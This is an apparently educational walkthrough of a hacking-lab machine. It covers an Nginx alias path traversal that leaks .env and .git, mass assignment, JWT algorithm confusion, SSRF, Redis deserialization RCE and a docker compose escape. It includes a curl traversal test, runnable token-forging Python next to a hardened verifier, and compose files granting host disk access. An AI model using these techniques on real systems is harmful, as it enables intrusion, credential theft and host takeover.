2022/12/10
Introduction
Start of nmap, playing with the webapp and discovering it is a Laravel PHP app
Discovering /assets is a redirect to /assets/, an indicator of the Nginx off-by-slash misconfiguration (an alias directive whose location prefix lacks the trailing slash) [MasterRecon]
Using the Nginx off-by-slash to download .env and .git and recover the source code of the app
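The misconfiguration behind the /assets to /assets/ tell, as an added example written for this page (not configuration taken from the target); the directory paths are assumptions:

```nginx
# Vulnerable: the location prefix has no trailing slash but the alias does.
# nginx replaces the matched prefix with the alias and appends whatever follows,
# so "/assets../.env" maps to "/var/www/app/public/assets/" + "../.env", i.e.
# /var/www/app/public/.env, and "/assets../../.env" reaches /var/www/app/.env
# (the Laravel .env outside the web root); .git/HEAD, .git/index etc. the same way.
location /assets {
    alias /var/www/app/public/assets/;
}

# Fixed: prefix and alias both end in a slash (or serve with "root" instead of
# "alias"). "/assets../" no longer matches the location, so nothing escapes the
# assets directory.
location /assets/ {
    alias /var/www/app/public/assets/;
}
```

The 301 from `/assets` to `/assets/` is nginx's directory redirect firing on the aliased directory, which is why it hints at this shape of config. Test with `curl --path-as-is http://target/assets../../.env`; without `--path-as-is` curl collapses the `..` client-side and the request never exercises the bug.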
Start of code analysis
Finding a Mass Assignment vulnerability in the update functionality
Taking some time to explore if there are ways to find Mass Assignment without looking at the code or guessing
Looking at the Webhooks-api-beta website, playing with the request and discovering we need to send it JSON
Playing with the JWT, discovering it is RS256-signed, and doing an algorithm confusion attack: switching alg to HS256 and signing the token with the RSA public key as the HMAC secret
Playing with the webhook and discovering an SSRF; since we control the HTTP method, we can also do protocol smuggling (inject CRLF-separated lines into the request)
Looking at the Redis Migrate functionality, which confirms we can interact with Redis. Also standing up Redis on our box with Docker
Inserting a poisoned Laravel cookie, created with phpggc, into Redis and troubleshooting all the encoding issues. Browsing the page deserializes our cookie and gives us RCE
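The algorithm confusion attack end to end, as an added example written for this page (not the video's or the target's code). It carries a demo-sized RSA/RS256 implemented with the standard library so it runs stand-alone; the server's public key is held as a JSON/JWK-style string standing in for the PEM file a real server would keep, and `verify_vulnerable`, `verify_hardened` and the claim names are made up for the demo:

```python
import base64, hashlib, hmac, json, secrets

# Demo-sized RSA (512-bit) from the standard library so the example runs
# stand-alone. Not for real use; it only exists to make RS256 verifiable here.
def _probable_prime(n, rounds=20):
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits):
    while True:
        c = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _probable_prime(c):
            return c

def generate_rsa_keypair(bits=512):
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) * (q - 1) % e:
            break
    n, d = p * q, pow(e, -1, (p - 1) * (q - 1))
    return {"n": n, "e": e}, {"n": n, "d": d}

_DIGESTINFO_SHA256 = bytes.fromhex("3031300d060960864801650304020105000420")

def _emsa_pkcs1_v15(msg, k):  # RSASSA-PKCS1-v1_5 encoding of SHA-256(msg), k = modulus bytes
    t = _DIGESTINFO_SHA256 + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def _b64u(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def _b64u_dec(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def public_key_text(pub):
    # Stand-in for the PEM file the server holds (assumption of this demo). An attacker
    # can obtain it verbatim: JWKS endpoint, leaked source tree, TLS certificate.
    return json.dumps({"kty": "RSA", "n": pub["n"], "e": pub["e"]}, sort_keys=True)

def _signing_input(alg, claims):
    header = _b64u(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    return header + "." + _b64u(json.dumps(claims).encode())

def sign_rs256(claims, priv):
    """Legitimate issuer: RS256 with the private key."""
    si = _signing_input("RS256", claims)
    k = (priv["n"].bit_length() + 7) // 8
    sig = pow(_emsa_pkcs1_v15(si.encode(), k), priv["d"], priv["n"]).to_bytes(k, "big")
    return si + "." + _b64u(sig)

def forge_hs256_with_public_key(claims, pub):
    """Attacker: declare HS256 and use the server's *public* key bytes as the HMAC secret."""
    si = _signing_input("HS256", claims)
    sig = hmac.new(public_key_text(pub).encode(), si.encode(), hashlib.sha256).digest()
    return si + "." + _b64u(sig)

def _rs256_ok(si, sig, pub):
    k = (pub["n"].bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _emsa_pkcs1_v15(si, k)

def verify_vulnerable(token, pub):
    """Bug: the token header picks the algorithm, so the one configured key is fed to HMAC when alg=HS256."""
    h, p, s = token.split(".")
    alg, si, sig = json.loads(_b64u_dec(h))["alg"], (h + "." + p).encode(), _b64u_dec(s)
    if alg == "HS256":
        ok = hmac.compare_digest(hmac.new(public_key_text(pub).encode(), si, hashlib.sha256).digest(), sig)
    elif alg == "RS256":
        ok = _rs256_ok(si, sig, pub)
    else:
        ok = False
    return json.loads(_b64u_dec(p)) if ok else None

def verify_hardened(token, pub):
    """Fix: the accepted algorithm is pinned server-side; the header cannot downgrade it."""
    h, p, s = token.split(".")
    if json.loads(_b64u_dec(h)).get("alg") != "RS256":
        return None
    return json.loads(_b64u_dec(p)) if _rs256_ok((h + "." + p).encode(), _b64u_dec(s), pub) else None
```

The forgery only works with the exact bytes the server hands to its HMAC, so against a real PEM the attack is a short search over encodings of the same key (with and without the trailing newline, DER vs PEM, etc.), which matches the trial and error seen in the video. JWT libraries close the hole by taking an allow-list of algorithms from the caller and ignoring the header, which is what the hardened verifier does in miniature.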
Reverse shell returned, examining the MySQL database and Redis keys
Uploading a static nmap to scan the Docker containers, finding a Docker registry, and downloading the API container to get its source code
Source code analysis of the webhook code, discovering a file disclosure and a hardcoded API key
Dumping the environment variables, getting the DB password, which is also a user password; SSH in as john
John can run docker compose on a sanitized compose file; there are a few ways to bypass this check
Showing we can pass in a raw device, which works without adding any special capabilities to the container but is very, very dangerous (direct read/write access to the host's disk)
Showing we can also pass in a volume as RO and grant the capability and AppArmor policy that let the container remount it as RW
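The two compose shapes described in the last two chapters, as added examples written for this page (not the files used in the video); the image, device path and mount point are assumptions, and the two documents are meant as two separate compose files:

```yaml
# 1) Raw device pass-through. No extra capabilities are needed: the container
#    receives the host's block device node and can read and write it directly.
services:
  escape:
    image: alpine
    command: sleep infinity
    devices:
      - /dev/sda1:/dev/sda1   # host disk (assumed path)
---
# 2) Read-only bind mount that the container is then allowed to remount
#    read-write. The capability and the disabled AppArmor profile are what make
#    `mount -o remount,bind,rw /host` succeed inside the container.
services:
  escape:
    image: alpine
    command: sleep infinity
    volumes:
      - /:/host:ro
    cap_add:
      - SYS_ADMIN
    security_opt:
      - apparmor:unconfined
```

With the first file, `docker compose up -d` and `docker compose exec escape sh` give a shell that can read and write `/dev/sda1` without mounting it (on ext2/3/4 a tool such as `debugfs -w` edits files on the raw device), which is why it needs no capability and why a mistake goes straight to the host's filesystem. With the second, `mount -o remount,bind,rw /host` flips the per-mount read-only flag; `SYS_ADMIN` is what the kernel (and Docker's default seccomp profile) requires for the mount call, and `apparmor:unconfined` removes the docker-default profile that would otherwise deny it. A sanitizer that strips `privileged: true` but leaves `devices`, `cap_add` and `security_opt` alone blocks neither.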